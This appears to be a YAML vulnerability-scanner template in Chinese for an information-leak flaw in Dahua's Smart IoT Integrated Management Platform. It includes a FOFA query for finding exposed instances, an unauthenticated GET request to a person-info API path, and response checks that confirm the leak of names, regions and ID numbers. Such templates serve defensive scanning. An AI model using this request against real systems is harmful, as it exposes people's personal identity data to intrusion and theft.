product: 大华智能物联综合管理平台
vName: 大华智能物联综合管理平台 page信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 当前版本管理平台存在信息泄漏漏洞，攻击者可以利用该漏洞获取系统敏感信息(姓名，归属地区，身份证号码等)，可能造成数据安全隐患，为下一步进攻提供有利条件。
version: ''
note: ''
search:
  FOFA: body="static/fontshd/font-hd.css" || body="客户端会小于800"
protocol: http
link: ''
fix:
  - 前往官网升级最新版本。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /evo-apigw/evo-face/personInfo/page?pageSize=1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - pageData
              - enableCloudDB
            logic: and